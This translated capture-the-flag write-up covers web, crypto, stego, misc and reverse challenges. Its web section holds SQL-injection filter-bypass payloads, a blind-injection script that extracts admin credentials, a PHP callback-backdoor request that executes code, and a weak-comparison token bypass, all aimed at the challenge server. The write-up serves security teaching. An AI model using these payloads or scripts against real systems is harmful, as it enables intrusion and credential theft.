?>
</div>
</center>
</body>
</html>
From so.php
we learn of antiinject.php.
antiinject.php
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
function antiinject($content){
    $keyword=array("select","union","and","from",' ',"'",";",'"',"char","or","count","master","name","pass","admin","+","-","order","=");
    $info=strtolower($content);
    for($i=0;$i<=count($keyword);$i++){
        $info=str_replace($keyword[$i], '',$info);
    }
    return $info;
}
?>
With that, essentially all the source files have been obtained. (Thanks to my friend 雞, there is also a script that pulls down all the source in one go; see his blog.)
Script:
# -*- coding: utf-8 -*-
import codecs
import html
import requests

files = ['say', 'config', 'passencode', 'index', 'so', 'antiinject', 'antixss', 'about', 'preview']
for name in files:
    url = "http://cms.nuptzj.cn/about.php?file={0}.php".format(name)
    r = requests.get(url)
    r.encoding = 'utf-8'
    with codecs.open(name + '.php', 'w+', 'utf-8') as f:   # codecs lets us pick the file encoding
        f.write(html.unescape(r.text))                      # undo the HTML entity escaping applied by about.php
Analysing the source
From so.php
and antiinject.php
we can see that the search feature has a SQL injection. Studying antiinject.php
shows that it replaces a set of keywords with the empty string, but it only filters each keyword once, which makes the injected statement easy to construct. Because the User-Agent is fixed, change it with Modify Headers.
Constructed statement:
soid=1/**/aANDnd/**/exists(sSELECTelect/**/*/**/fFROMrom/**/aADMINdmin/**/where/**/length(usernnameame)>4)
gives: username
has length 5
soid=1/**/aANDnd/**/exists(sSELECTelect/**/*/**/fFROMrom/**/aADMINdmin/**/where/**/length(userpaspasss)>33)
gives: userpass
has length 34
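To make the filter's failure concrete, here is an added Python example (not the CMS's or the writeup's code): a faithful port of antiinject() applied to the probe above, next to the handling so.php should have used, an allow-listed integer bound as a query parameter. The sqlite table and its rows are constructed sample data; the function names are assumptions.

```python
import sqlite3

# Port of the CMS's antiinject(): lower-case the input, then delete each keyword once.
KEYWORDS = ["select", "union", "and", "from", " ", "'", ";", '"', "char", "or",
            "count", "master", "name", "pass", "admin", "+", "-", "order", "="]

def antiinject(content: str) -> str:
    info = content.lower()
    for kw in KEYWORDS:               # one str_replace() pass per keyword, in list order
        info = info.replace(kw, '')   # "sSELECTelect" loses the inner "select" and becomes "select"
    return info

def vulnerable_sql(soid: str) -> str:
    """so.php's statement after the filter: the stripped text is concatenated unquoted."""
    return "SELECT * FROM `message` WHERE display=1 AND id=" + antiinject(soid)

def safe_lookup(conn: sqlite3.Connection, soid: str):
    """Hardened handling: message ids are integers, so allow-list the shape and bind it.
    Nothing from the request ever becomes part of the SQL text."""
    if not soid.isdigit():
        raise ValueError("soid must be a decimal integer")
    cur = conn.execute(
        "SELECT nice, say FROM message WHERE display=1 AND id=?", (int(soid),))
    return cur.fetchone()

def demo_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the CMS's message table."""
    conn = sqlite3.connect(':memory:')
    conn.execute("CREATE TABLE message (id INTEGER, nice TEXT, say TEXT, display INTEGER)")
    conn.executemany("INSERT INTO message VALUES (?, ?, ?, ?)",
                     [(1, 'alice', 'first post', 1), (2, 'bob', 'awaiting review', 0)])
    return conn
```

Looping the filter until nothing changes would only remove the nesting trick; keyword blacklists still break on encodings and comments, which is why the bound parameter, not a better blacklist, is the fix.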
Then write a script to brute-force the account and password:
import requests

url = "http://cms.nuptzj.cn/so.php"
header = {
    'User-Agent': 'Xlcteam Browser',
    'Host': 'cms.nuptzj.cn',
}
dic = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
result = ""
for j in range(1, 6):
    for i in dic:
        id = '1/**/aANDnd/**/exists(sSELECTelect/**/*/**/fFROMrom/**/aADMINdmin/**/WHERE/**/oORrd(substr(usernnameame,{0},1))>{1})'.format(j, ord(i))
        #id = '1/**/aANDnd/**/exists(sSELECTelect/**/*/**/fFROMrom/**/aADMINdmin/**/WHERE/**/oORrd(substr(userpaspasss,{0},1))>{1})'.format(j, ord(i))
        data = {
            "soid": id
        }
        response = requests.post(url=url, headers=header, data=data)
        if len(response.text) < 430:
            result += i
            break
print(result)
Account: admin
Password: 1020117099010701140117011001160117
From passencode.php
we know the ciphertext is a sequence of ASCII codes; decoding gives fuckruntu.
Then log in at http://cms.nuptzj.cn/loginxlcteam
and open lcteam.php,
which contains:
<?php
$e = $_REQUEST['www'];
$arr = array($_POST['wtf'] => '|.*|e',);
array_walk($arr, $e, '');
?>
A typical PHP callback backdoor; list all the files with
www=preg_replace&wtf=print_r(scandir("."))
which reveals the file 恭喜你獲得flag2.txt;
accessing it gives the flag: nctf{you_are_s0_g00d_hacker}
Password reset 2
Completely lost, so look at the tips:
TIPS:
1. The admin email can be found by observation
2. On Linux vi is commonly used, and an abnormal exit leaves a backup file
3. Weak-type bypass
Looking at the page source gives the admin email:
<meta name="admin" content="[email protected]" />
Then, following tip 2, a search
(http://blog.sina.com.cn/s/blog_87f166cf010178sn.html)
shows that vi leaves .swp
files; trying it, .submit.php.swp
exists and contains the key source:
........ this line stands for omitted code ........
/*
If the login email address is not the administrator's, die()
Database structure
--
-- Table structure for `user`
--
CREATE TABLE IF NOT EXISTS `user` (
    `id` int(11) NOT NULL AUTO_INCREMENT,
    `username` varchar(255) NOT NULL,
    `email` varchar(255) NOT NULL,
    `token` int(255) NOT NULL DEFAULT '0',
    PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ;
--
-- Dumping data for table `user`
--
INSERT INTO `user` (`id`, `username`, `email`, `token`) VALUES
(1, '****不可見***', '***不可見***', 0);
*/
........ this line stands for omitted code ........
if(!empty($token)&&!empty($emailAddress)){
    if(strlen($token)!=10) die('fail');
    if($token!='0') die('fail');
    $sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'";
    $r = mysql_query($sql) or die('db error');
    $r = mysql_fetch_assoc($r);
    $r = $r['num'];
    if($r>0){
        echo $flag;
    }else{
        echo "失敗了呀";
    }
}
Note: Firefox usually shows this file garbled; switch the character encoding, or view the source in Chrome, which displays it correctly.
Looking at the key part of the code:
if(!empty($token)&&!empty($emailAddress)){
    if(strlen($token)!=10) die('fail');
    if($token!='0') die('fail');
    $sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'";
token must be 10 characters long and compare equal to 0 (a loose comparison), with no other constraints, so token=0000000000.
Enter the email and the token
to get
flag: nctf{thanks_to_cumt_bxs}
Steganography
Goddess
The download is a photo of a goddess; open it in Stegsolve and use File Format
to find the flag.
Image seed (圖種)
Download the animated image; since it is a 圖種 (an image with an archive appended), rename it to .zip,
then
extract it to get another animated image; analysing that gives the flag.
Crypto
easy
A string; base64 decoding it gives the flag.
KeyBoard
Since the hint is the keyboard, trace the characters on a keyboard to get the flag: nctf{areuhack}
base64 family pack
A string:
R1pDVE1NWlhHUTNETU4yQ0dZWkRNTUpYR00zREtNWldHTTJES1JSV0dJM0RDTlpUR1kyVEdNWlRHSTJVTU5SUkdaQ1RNTkJWSVkzREVOUlJHNFpUTU5KVEdFWlRNTjJF
Decode it as base64, base32 and base16 in turn to get the flag.
n times base64
Just keep decoding until the flag appears.
Young man, fancy a go?
A ciphertext:
iEJqak3pjIaZ0NzLiITLwWTqzqGAtW2oyOTq1A3pzqas
and a PHP encryption function; reverse its steps to decrypt:
<?php
function decode($str)
{
    $_='';
    $one=str_rot13($str);
    $two=strrev($one);
    $three=base64_decode($two);
    $four=strrev($three);
    for($i=0;$i<strlen($four);$i++)
    {
        $_c=substr($four,$i,1);
        $__=ord($_c)-1;
        $_c=chr($__);
        $_=$_.$_c;
    }
    return $_;
}
print decode("iEJqak3pjIaZ0NzLiITLwWTqzqGAtW2oyOTq1A3pzqas");
?>
Decoding gives the flag.
mixed_base64
Given the ciphertext, analysis shows it is 10 layers of randomly chosen base16, base32 and base64
encoding; judge each layer by the characteristics of its ciphertext and decode in turn to get the flag. The last few layers:
52314A4256457452536C564A56544A4554553543566B64564D31524A54567056535555795255644F51304A48556B4A4553553543565563304D6C524A5456705452314A4352456C52556C564857544A465230354B565564524E46524C546C7057523030795245744F51304E4855567045535539435655645A4D6B564A546B70575231466156457450516C56484E444A455530354C516B64524D6C524C54307057527A51795255564F51305A48556B4A455331464B56556C464D6C524C546B4E4652314A445645744E576C5A4A52544A465255354B55306452576B524A546B705552316B7956456C4F536C524856544A4553564653566B644A4D6B5250546B7057523030795245744E536C5A4A52544A5555553544516B64564D30524A5556705652316B7956454E4F536C4E485456704553553943565563304D6B564A546B74435231557956456C52556C5A4855544A465255354B574564524D31524C555570565345557956456C4E576C4E4856566C455356464B564564564D6B5252546B70575230354452456453516C524A55567056535530795255644F5130453950543039
16
R1JBVEtRSlVJVTJETU5CVkdVM1RJTVpVSUUyRUdOQ0JHUkJESU5CVUc0MlRJTVpTR1JCRElRUlVHWTJFR05KVUdRNFRLTlpWR00yREtOQ0NHUVpESU9CVUdZMkVJTkpWR1FaVEtPQlVHNDJEU05LQkdRMlRLT0pWRzQyRUVOQ0ZHUkJES1FKVUlFMlRLTkNFR1JDVEtNWlZJRTJFRU5KU0dRWkRJTkpUR1kyVElOSlRHVTJESVFSVkdJMkRPTkpWR00yREtNSlZJRTJUUU5DQkdVM0RJUVpVR1kyVENOSlNHTVpESU9CVUc0MkVJTktCR1UyVElRUlZHUTJFRU5KWEdRM1RLUUpVSEUyVElNWlNHVVlESVFKVEdVMkRRTkpWR05DREdSQlRJUVpVSU0yRUdOQ0E9PT09
64
GRATKQJUIU2DMNBVGU3TIMZUIE2EGNCBGRBDINBUG42TIMZSGRBDIQRUGY2EGNJUGQ4TKNZVGM2DKNCCGQZDIOBUGY2EINJVGQZTKOBUG42DSNKBGQ2TKOJVG42EENCFGRBDKQJUIE2TKNCEGRCTKMZVIE2EENJSGQZDINJTGY2TINJTGU2DIQRVGI2DONJVGM2DKMJVIE2TQNCBGU3DIQZUGY2TCNJSGMZDIOBUG42EINKBGU2TIQRVGQ2EENJXGQ3TKQJUHE2TIMZSGUYDIQJTGU2DQNJVGNCDGRBTIQZUIM2EGNCA====
32
4A5A4E464557434A4C4A4B444754324B4B464C54495753454B4248464D55435847495A4559574B4E4B5A4A554D4E535A4B524245365453544B52475534515A584A564C4651523248474D5A554B544B57475A495432504A3548553D3D3D3D3D3D
16
JZNFEWCJLJKDGT2KKFLTIWSEKBHFMUCXGIZEYWKNKZJUMNSZKRBE6TSTKRGU4QZXJVLFQR2HGMZUKTKWGZIT2PJ5HU======
64
NZRXIZT3OJQW4ZDPNVPW22LYMVSF6YTBONSTMNC7MVXGG33EMV6Q====
32
nctf{random_mixed_base64_encode}
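The "decode layer by layer" procedure of this challenge and of n times base64 above, as an added Python example that is not part of the original writeup: it picks each layer's scheme by trying the most restrictive alphabet first and accepting the first decode that is printable ASCII, and stops at a flag-shaped string. The input is the third-from-last layer quoted above; the function names are assumptions.

```python
import base64
import re
import string

_PRINTABLE = set(string.printable)

# Try the most restrictive alphabet first: every hex string is also valid base32/base64 text.
_DECODERS = (
    ("base16", lambda s: base64.b16decode(s, casefold=True)),
    ("base32", base64.b32decode),
    ("base64", base64.b64decode),
)

def peel_layer(text: str):
    """Return (scheme, decoded) for the first scheme whose output is printable ASCII,
    or (None, None) when nothing decodes cleanly."""
    for name, decode in _DECODERS:
        try:
            out = decode(text.encode('ascii')).decode('ascii')
        except ValueError:                 # binascii.Error and UnicodeDecodeError both derive from it
            continue
        if out and all(ch in _PRINTABLE for ch in out):
            return name, out
    return None, None

def peel_all(text: str, max_layers: int = 32):
    """Strip layers until the text looks like a flag or nothing decodes cleanly.
    Returns (final_text, [(scheme, intermediate_text), ...])."""
    layers = []
    current = text.strip()
    while len(layers) < max_layers and not re.fullmatch(r'\w+\{[^}]*\}', current):
        name, out = peel_layer(current)
        if name is None:
            break
        layers.append((name, out))
        current = out.strip()
    return current, layers

def wrap_base16(text: str) -> str:
    """Add one more base16 layer on top, to exercise the hex branch as well."""
    return base64.b16encode(text.encode('ascii')).decode('ascii')

# The third-from-last layer, exactly as quoted on this page (base32 despite its label)
LAYER_ON_PAGE = ("JZNFEWCJLJKDGT2KKFLTIWSEKBHFMUCXGIZEYWKNKZJUMNSZKRBE6TSTKRGU4QZX"
                 "JVLFQR2HGMZUKTKWGZIT2PJ5HU======")
```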
Opposites attract
The task is to XOR the contents of the two txt files; per the hint, they are the same length.
Script:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
with open('C:/Users/XX/Desktop/mi.txt', 'rb') as f_a, open('C:/Users/XX/Desktop/ming.txt', 'rb') as f_b:
    a = f_a.read()
    b = f_b.read()
# XOR the two files byte by byte (they are the same length)
s = bytes(i ^ j for i, j in zip(a, b))
print(s.decode('latin-1'))
MD5
Brute-force directly:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import hashlib
import string
# enumerate the three unknown uppercase letters and keep the digest matching the known prefix
for i in string.ascii_uppercase:
    for j in string.ascii_uppercase:
        for k in string.ascii_uppercase:
            a = 'TASC' + i + 'O3RJMV' + j + 'WDJKX' + k + 'ZM'
            b = hashlib.md5(a.encode()).hexdigest()
            if b[0:5] == 'e9032':
                print(b)
MISC
easy wireshark
Reportedly the capture contains his web browsing and the flag is in a page.
Under http there is a flag.php
page; export it and the flag is inside.
wireshark 2 (since for some reason the capture could not be downloaded, this is a repost of an online writeup)
Open the download in Wireshark
and look;
analysis yields a zip.
Following an expert's hint that there is another zip file, search for 504b0304
to find it; inside is flag.zip,
which we save.
It then reports the file is damaged; repairing it with rar
shows there is a flag inside but it is password protected. Several cracking attempts fail, so continue analysing the capture.
Filtering on http
turns up a secret.txt;
following the TCP stream for secret gives
Reverse
Hello,RE!
A Windows exe; open it in IDA and read the code:
int __cdecl main(int argc, const char **argv, const char **envp)
{
    _BYTE v4[3]; // [sp+11h] [bp-7Fh]@2
    signed int v5; // [sp+75h] [bp-1Bh]@1
    signed int v6; // [sp+79h] [bp-17h]@1
    signed int v7; // [sp+7Dh] [bp-13h]@1
    signed int v8; // [sp+81h] [bp-Fh]@1
    signed int v9; // [sp+85h] [bp-Bh]@1
    signed int v10; // [sp+89h] [bp-7h]@1
    signed __int16 v11; // [sp+8Dh] [bp-3h]@1
    char v12; // [sp+8Fh] [bp-1h]@1
    __main();
    printf("請輸入flag:");
    v5 = 1734437990;
    v6 = 1818580859;
    v7 = 1701670755;
    v8 = 1601131615;
    v9 = 1465861458;
    v10 = 1684828783;
    v11 = 32033;
    v12 = 0;
    while ( scanf("%s", v4) != -1 && strcmp(v4, (const char *)&v5) )
        printf("flag錯誤。再試試?\n");
    printf("flag正確。\n");
    printf("如果是南郵16級新生並且感覺自己喜歡逆向的話記得加羣\n");
    printf("羣號在ctf.nuptsast.com的to 16級新生頁面裏\n");
    printf("很期待遇見喜歡re的新生23333\n");
    getchar();
    getchar();
    return 0;
}
The input string is compared in plaintext against a string in memory (v5 through v12 are laid out consecutively on the stack). As the challenge hints, pressing R in IDA
converts the numbers straight into characters; note the little-endian
byte order when reading them.
Or just write an exploit script:
consts = [1734437990, 1818580859, 1701670755, 1601131615, 1465861458, 1684828783, 32033]
for i in consts:
    print(hex(i), end=' ')
print()
# the bytes of the constants above, read in little-endian order
num = [0x66, 0x6c, 0x61, 0x67, 0x7b, 0x57, 0x65, 0x6c, 0x63, 0x6f, 0x6d, 0x65, 0x5f, 0x54, 0x6f, 0x5f, 0x52, 0x45, 0x5f, 0x57, 0x6f, 0x72, 0x6c, 0x64, 0x21, 0x7d]
flag = ""
for i in num:
    flag += chr(i)
print(flag)
flag:flag{Welcome_To_RE_World!}
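The same recovery done generally, as an added example that is not part of the original writeup: instead of transcribing bytes by hand, lay the stack constants out with struct exactly as the compiler did (six 32-bit ints, one 16-bit int, then the NUL in v12) and decode, which also makes the little-endian point visible by comparing against the big-endian reading. Names are assumptions for illustration.

```python
import struct

# Stack constants from the IDA listing, in stack order: v5..v10 are 32-bit, v11 is 16-bit, v12 = 0
INTS = [1734437990, 1818580859, 1701670755, 1601131615, 1465861458, 1684828783]
SHORT = 32033

def recover_string(ints, short, byteorder='<'):
    """Reassemble the bytes the way they sit in memory and read them as a C string.
    byteorder '<' is little-endian (x86), '>' would be big-endian."""
    buf = b''.join(struct.pack(byteorder + 'I', v) for v in ints)
    buf += struct.pack(byteorder + 'H', short)
    buf += b'\x00'                                   # v12 terminates the string
    return buf.split(b'\x00', 1)[0].decode('ascii')

def both_orders():
    """Show why the byte order matters: only one reading is the expected text."""
    return {'little': recover_string(INTS, SHORT, '<'),
            'big': recover_string(INTS, SHORT, '>')}

if __name__ == '__main__':
    for order, text in both_orders().items():
        print(order, text)
```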
RedASM
Since the challenge tests reading asm and static analysis, there is not much to explain.
First, the given C program:
int main(int argc, char const *argv[])
{
    char input[] = {0x0, 0x67, 0x6e, 0x62, 0x63, 0x7e, 0x74, 0x62, 0x69, 0x6d,
                    0x55, 0x6a, 0x7f, 0x60, 0x51, 0x66, 0x63, 0x4e, 0x66, 0x7b,
                    0x71, 0x4a, 0x74, 0x76, 0x6b, 0x70, 0x79, 0x66, 0x1c};
    func(input, 28);
    printf("%s\n", input+1);
    return 0;
}
where the function func
is given as asm:
00000000004004e6 <func>:
4004e6: 55 push rbp
4004e7: 48 89 e5 mov rbp,rsp
4004ea: 48 89 7d e8 mov QWORD PTR [rbp-0x18],rdi
4004ee: 89 75 e4 mov DWORD PTR [rbp-0x1c],esi
4004f1: c7 45 fc 01 00 00 00 mov DWORD PTR [rbp-0x4],0x1
4004f8: eb 28 jmp 400522 <func+0x3c>
4004fa: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
4004fd: 48 63 d0 movsxd rdx,eax
400500: 48 8b 45 e8 mov rax,QWORD PTR [rbp-0x18]
400504: 48 01 d0 add rax,rdx
400507: 8b 55 fc mov edx,DWORD PTR [rbp-0x4]
40050a: 48 63 ca movsxd rcx,edx
40050d: 48 8b 55 e8 mov rdx,QWORD PTR [rbp-0x18]
400511: 48 01 ca add rdx,rcx
400514: 0f b6 0a movzx ecx,BYTE PTR [rdx]
400517: 8b 55 fc mov edx,DWORD PTR [rbp-0x4]
40051a: 31 ca xor edx,ecx
40051c: 88 10 mov BYTE PTR [rax],dl
40051e: 83 45 fc 01 add DWORD PTR [rbp-0x4],0x1 ; increment the counter
400522: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
400525: 3b 45 e4 cmp eax,DWORD PTR [rbp-0x1c]
400528: 7e d0 jle 4004fa <func+0x14>
40052a: 90 nop
40052b: 5d pop rbp
40052c: c3 ret
Splitting the program into parts: the first part is the function prologue; rdi
and esi
are the two arguments of func().
It then jumps to the third part, which compares esi
with the counter against 28,
i.e. checks the string length.
The second part looks long, but it actually just does this:
for(int i=1;i<=28;i++)
    input[i]=input[i]^i
Write the exploit directly:
data = [0x67, 0x6e, 0x62, 0x63, 0x7e, 0x74, 0x62, 0x69, 0x6d, 0x55, 0x6a, 0x7f, 0x60, 0x51, 0x66, 0x63, 0x4e, 0x66, 0x7b, 0x71, 0x4a, 0x74, 0x76, 0x6b, 0x70, 0x79, 0x66, 0x1c]
# print(len(data))
flag = ""
num = 1
for i in data:
    flag += chr(i ^ num)   # undo input[i] ^= i, with the index starting at 1
    num = num + 1
print(flag)
flag:flag{read_asm_is_the_basic}